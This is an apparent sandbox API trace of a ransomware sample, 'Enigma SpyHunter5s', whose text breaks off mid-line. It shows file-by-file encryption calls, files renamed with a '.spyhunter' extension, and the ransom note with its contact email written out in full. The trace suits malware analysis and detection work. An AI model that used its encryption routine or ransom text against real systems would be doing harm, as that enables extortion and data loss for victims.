CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd08 | out: pbBuffer=0x248fd08) returned 1 [0095.358] GetProcessHeap () returned 0x2c0000 [0095.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd00*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd00*=0x30) returned 1 [0095.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.359] GetProcessHeap () returned 0x2c0000 [0095.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.359] GetProcessHeap () returned 0x2c0000 [0095.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d4f0 | out: hHeap=0x2c0000) returned 1 [0095.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd08 | out: pbBuffer=0x248fd08) returned 1 [0095.359] GetProcessHeap () returned 0x2c0000 [0095.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.359] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd00*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd00*=0x30) returned 1 [0095.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ielowutil.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.359] GetProcessHeap () returned 0x2c0000 [0095.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.359] GetProcessHeap () returned 0x2c0000 [0095.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d680 | out: hHeap=0x2c0000) returned 1 [0095.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd00 | out: pbBuffer=0x248fd00) returned 1 [0095.360] GetProcessHeap () returned 0x2c0000 [0095.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcf8*=0x30) returned 1 [0095.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.360] GetProcessHeap () returned 0x2c0000 [0095.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.360] GetProcessHeap () returned 0x2c0000 [0095.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d748 | out: hHeap=0x2c0000) returned 1 [0095.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd00 | out: pbBuffer=0x248fd00) returned 1 [0095.360] GetProcessHeap () returned 0x2c0000 [0095.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcf8*=0x30) returned 1 [0095.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iedvtool.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.360] GetProcessHeap () returned 0x2c0000 [0095.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.360] GetProcessHeap () returned 0x2c0000 [0095.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d5b8 | out: hHeap=0x2c0000) returned 1 [0095.361] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcf8 | out: pbBuffer=0x248fcf8) returned 1 [0095.361] GetProcessHeap () returned 0x2c0000 [0095.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcf0*=0x30) returned 1 [0095.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.361] GetProcessHeap () returned 0x2c0000 [0095.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.361] GetProcessHeap () returned 0x2c0000 [0095.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d058 | out: hHeap=0x2c0000) returned 1 [0095.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0095.361] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0095.361] WriteFile (in: hFile=0x170, lpBuffer=0x248fc2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fd54, lpOverlapped=0x0 | out: lpBuffer=0x248fc2b*, lpNumberOfBytesWritten=0x248fd54*=0x127, lpOverlapped=0x0) returned 1 [0095.362] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0095.362] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fd54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fd54*=0x2ac, lpOverlapped=0x0) returned 1 [0095.362] CloseHandle (hObject=0x170) returned 1 [0095.362] GetProcessHeap () returned 0x2c0000 [0095.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330d40 | out: hHeap=0x2c0000) returned 1 [0095.363] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcf0 | out: pbBuffer=0x248fcf0) returned 1 [0095.363] GetProcessHeap () returned 0x2c0000 [0095.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fce8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fce8*=0x30) returned 1 [0095.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll" (normalized: "c:\\program files\\dvd maker\\wmm2clip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.363] GetProcessHeap () returned 0x2c0000 [0095.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.363] GetProcessHeap () returned 0x2c0000 [0095.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x351188 | out: hHeap=0x2c0000) returned 1 [0095.363] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcf0 | out: pbBuffer=0x248fcf0) returned 1 [0095.363] GetProcessHeap () returned 0x2c0000 [0095.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fce8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fce8*=0x30) returned 1 [0095.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.363] GetProcessHeap () returned 0x2c0000 [0095.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.363] GetProcessHeap () returned 0x2c0000 [0095.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d000 | out: hHeap=0x2c0000) returned 1 [0095.363] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fce8 | out: pbBuffer=0x248fce8) returned 1 [0095.363] GetProcessHeap () returned 0x2c0000 [0095.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fce0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fce0*=0x30) returned 1 [0095.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.364] GetProcessHeap () returned 0x2c0000 [0095.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.364] GetProcessHeap () returned 0x2c0000 [0095.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329f48 | out: hHeap=0x2c0000) returned 1 [0095.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.495] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.495] WriteFile (in: hFile=0x178, lpBuffer=0x248fc1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fd44, lpOverlapped=0x0 | out: lpBuffer=0x248fc1b*, lpNumberOfBytesWritten=0x248fd44*=0x127, lpOverlapped=0x0) returned 1 [0096.496] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.496] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fd44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fd44*=0x2ac, lpOverlapped=0x0) returned 1 [0096.496] CloseHandle (hObject=0x178) returned 1 [0096.497] GetProcessHeap () returned 0x2c0000 [0096.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329dd8 | out: hHeap=0x2c0000) returned 1 [0096.497] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fce0 | out: pbBuffer=0x248fce0) returned 1 [0096.497] GetProcessHeap () returned 0x2c0000 [0096.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0096.497] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcd8*=0x30) returned 1 [0096.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 87 [0096.503] StrStrW (lpFirst="msmdsrv.rll", lpSrch=".txt") returned 0x0 [0096.503] GetProcessHeap () returned 0x2c0000 [0096.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c10048 [0096.503] ReadFile (in: hFile=0x178, lpBuffer=0x2c10048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesRead=0x248fc9c*=0x2800, lpOverlapped=0x0) returned 1 [0096.520] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.520] WriteFile (in: hFile=0x178, lpBuffer=0x2c10048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesWritten=0x248fc9c*=0x2800, lpOverlapped=0x0) returned 1 [0096.520] GetProcessHeap () returned 0x2c0000 [0096.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.520] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.520] WriteFile (in: hFile=0x178, lpBuffer=0x248fcdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x248fcdc*, lpNumberOfBytesWritten=0x248fc9c*=0x4, lpOverlapped=0x0) returned 1 [0096.550] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc9c*=0x30, lpOverlapped=0x0) returned 1 [0096.550] CloseHandle (hObject=0x178) returned 1 [0096.550] GetProcessHeap () returned 0x2c0000 [0096.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c150d8 [0096.551] wnsprintfW (in: pszDest=0x2c150d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.spyhunter") returned 97 [0096.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.spyhunter")) returned 1 [0096.552] GetProcessHeap () returned 0x2c0000 [0096.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c150d8 | out: hHeap=0x2c0000) returned 1 [0096.552] GetProcessHeap () returned 0x2c0000 [0096.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0096.552] GetProcessHeap () returned 0x2c0000 [0096.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0096.552] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fce0 | out: pbBuffer=0x248fce0) returned 1 [0096.553] GetProcessHeap () returned 0x2c0000 [0096.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0096.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcd8*=0x30) returned 1 [0096.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.632] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 73 [0096.632] StrStrW (lpFirst="msmgdsrv.dll", lpSrch=".txt") returned 0x0 [0096.632] GetProcessHeap () returned 0x2c0000 [0096.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c12890 [0096.632] ReadFile (in: hFile=0x178, lpBuffer=0x2c12890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesRead=0x248fc9c*=0x2800, lpOverlapped=0x0) returned 1 [0096.645] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.646] WriteFile (in: hFile=0x178, lpBuffer=0x2c12890*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesWritten=0x248fc9c*=0x2800, lpOverlapped=0x0) returned 1 [0096.646] GetProcessHeap () returned 0x2c0000 [0096.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12890 | out: hHeap=0x2c0000) returned 1 [0096.646] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.646] WriteFile (in: hFile=0x178, lpBuffer=0x248fcdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x248fcdc*, lpNumberOfBytesWritten=0x248fc9c*=0x4, lpOverlapped=0x0) returned 1 [0096.690] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc9c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc9c*=0x30, lpOverlapped=0x0) returned 1 [0096.690] CloseHandle (hObject=0x178) returned 1 [0096.769] GetProcessHeap () returned 0x2c0000 [0096.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c12890 [0096.769] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.spyhunter") returned 83 [0096.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.spyhunter")) returned 1 [0096.769] GetProcessHeap () returned 0x2c0000 [0096.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12890 | out: hHeap=0x2c0000) returned 1 [0096.769] GetProcessHeap () returned 0x2c0000 [0096.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0096.769] GetProcessHeap () returned 0x2c0000 [0096.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0096.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcd8 | out: pbBuffer=0x248fcd8) returned 1 [0096.770] GetProcessHeap () returned 0x2c0000 [0096.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0096.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcd0*=0x30) returned 1 [0096.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.817] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 83 [0096.817] StrStrW (lpFirst="sql2000.xsl", lpSrch=".txt") returned 0x0 [0096.818] GetProcessHeap () returned 0x2c0000 [0096.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c10048 [0096.818] ReadFile (in: hFile=0x178, lpBuffer=0x2c10048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesRead=0x248fc94*=0x2800, lpOverlapped=0x0) returned 1 [0096.834] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.834] WriteFile (in: hFile=0x178, lpBuffer=0x2c10048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesWritten=0x248fc94*=0x2800, lpOverlapped=0x0) returned 1 [0096.834] GetProcessHeap () returned 0x2c0000 [0096.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.834] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.835] WriteFile (in: hFile=0x178, lpBuffer=0x248fcd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x248fcd4*, lpNumberOfBytesWritten=0x248fc94*=0x4, lpOverlapped=0x0) returned 1 [0096.891] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc94*=0x30, lpOverlapped=0x0) returned 1 [0096.891] CloseHandle (hObject=0x178) returned 1 [0096.891] GetProcessHeap () returned 0x2c0000 [0096.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.892] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.spyhunter") returned 93 [0096.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as 